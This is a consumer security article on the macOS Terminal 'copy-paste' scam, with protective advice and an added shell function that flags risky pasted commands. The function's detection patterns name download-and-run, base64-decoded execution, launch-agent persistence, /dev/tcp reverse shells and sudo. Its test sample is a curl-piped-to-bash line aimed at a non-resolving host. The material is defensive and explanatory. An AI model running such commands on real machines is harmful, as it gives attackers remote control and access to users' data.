The "copy-paste" scam is a social engineering attack that targets macOS users by tricking them into executing malicious commands within the Terminal application. By convincing victims to paste pre-written code, attackers can gain remote control over a computer, install malware, or steal sensitive data. Security researchers and Apple have identified this as a persistent threat, leading to recent system-level safeguards designed to limit the risk of unauthorized Terminal access.
How the Copy-Paste Scam Operates
The attack relies on psychological manipulation rather than a software vulnerability. Scammers typically contact victims through phishing emails, text messages, or deceptive forum posts, often posing as technical support representatives or software troubleshooters. According to security analysis from organizations like Malwarebytes, the goal is to guide the user to the macOS Terminal app—a powerful command-line interface—and instruct them to paste a specific string of text.

Once the command is executed, it can grant the attacker persistent remote access to the machine. Because Terminal operates with high-level system permissions, a malicious command can circumvent standard graphical interface protections, allowing the attacker to bypass file permissions, log keystrokes, or exfiltrate private documents, financial information, and photos.
Why Terminal Is the Primary Target
The Terminal app is intended for developers and system administrators to manage macOS via text-based instructions. Because most users rarely interact with Terminal, they are less likely to recognize when a command is dangerous.
The mechanism often involves "indirect prompt injection," where a chatbot or a malicious website provides a command that looks like a legitimate fix for a technical issue. Once pasted, these commands can:
- Create a reverse shell, giving the attacker a direct connection to your Mac.
- Install hidden “persistence” scripts that relaunch the malware every time the computer boots.
- Lock the user out of their own files, effectively holding the machine for ransom.
How Apple Has Responded
In response to the rise of these social engineering tactics, Apple has updated macOS to include more robust warnings regarding Terminal usage. Recent versions of macOS include stricter prompts that require explicit user authorization before certain scripts or applications can interact with system-level files or external network connections.

These safeguards are intended to act as a "circuit breaker," forcing users to pause before executing code they do not fully understand. However, security experts emphasize that these protections do not replace user vigilance. If a command is granted permission by the user, the operating system will generally execute it as requested.
Protecting Your Mac from Terminal Attacks
To secure your device, follow these industry-standard security practices:
- Never paste code you don’t understand: If a support representative or an online forum suggests a Terminal command, verify it through official Apple documentation or reputable technical forums first.
- Verify the source: Apple support will never ask you to execute random commands in Terminal to “fix” your computer over a chat or phone call.
- Use standard tools: If you are experiencing technical issues, rely on the standard “System Settings” or the “Activity Monitor” rather than unknown Terminal scripts.
- Enable FileVault: Ensure your disk is encrypted to prevent unauthorized access to your data at the hardware level.
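
The first tip above can be partly mechanized. The following is an added example, not code from the original article: it inspects a command as text, without running it, and reports traits that match the behaviours listed earlier (download-and-run, hidden code, persistence, remote access). The function names and the pattern list are assumptions chosen for illustration and are not exhaustive.

```shell
# Added example (not from the original article): review a command as text
# before pasting it into Terminal. The pattern list is an illustrative
# assumption; a clean result does not prove that a command is safe.

# _flag COMMAND REGEX MESSAGE: print MESSAGE if COMMAND matches REGEX.
_flag() {
  if printf '%s\n' "$1" | grep -Eq -- "$2"; then
    printf '%s\n' "$3"
  fi
}

# Prints one finding per line; prints nothing when no pattern matches.
review_pasted_command() {
  rpc_cmd=$1
  # Download piped straight into an interpreter: the code runs unseen.
  _flag "$rpc_cmd" '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:]]|$)' \
    'download-and-run: fetched script is piped into a shell'
  # Encoded text decoded and executed: hides what will actually run.
  _flag "$rpc_cmd" 'base64[[:space:]]+(-d|-D|--decode)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)' \
    'obfuscation: base64-decoded text is piped into a shell'
  # Launch agents and daemons relaunch a program at login or boot.
  _flag "$rpc_cmd" '(Library/Launch(Agents|Daemons)|launchctl[[:space:]]+(load|bootstrap))' \
    'persistence: touches LaunchAgents/LaunchDaemons or launchctl'
  # A shell wired to a network socket hands control to a remote party.
  _flag "$rpc_cmd" '/dev/tcp/' \
    'remote-access: shell input/output redirected to a network socket'
  # Administrator rights widen what any of the above can reach.
  _flag "$rpc_cmd" '(^|[;&|[:space:]])sudo[[:space:]]' \
    'privilege: command asks for administrator rights'
  return 0
}

# Constructed samples for illustration; example.invalid never resolves.
for sample in \
  'curl -fsSL https://example.invalid/fix.sh | bash' \
  'softwareupdate --list'
do
  printf '== %s\n' "$sample"
  review_pasted_command "$sample"
done
```

Any finding is a reason to stop and verify the command with its source before running it; an empty result only means none of these particular patterns matched.
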
If you suspect you have already executed a malicious command, disconnect your Mac from the internet immediately to sever the attacker’s remote connection. Then, consult with an authorized Apple service provider or a professional security firm to audit your system for persistent malware or unauthorized user accounts.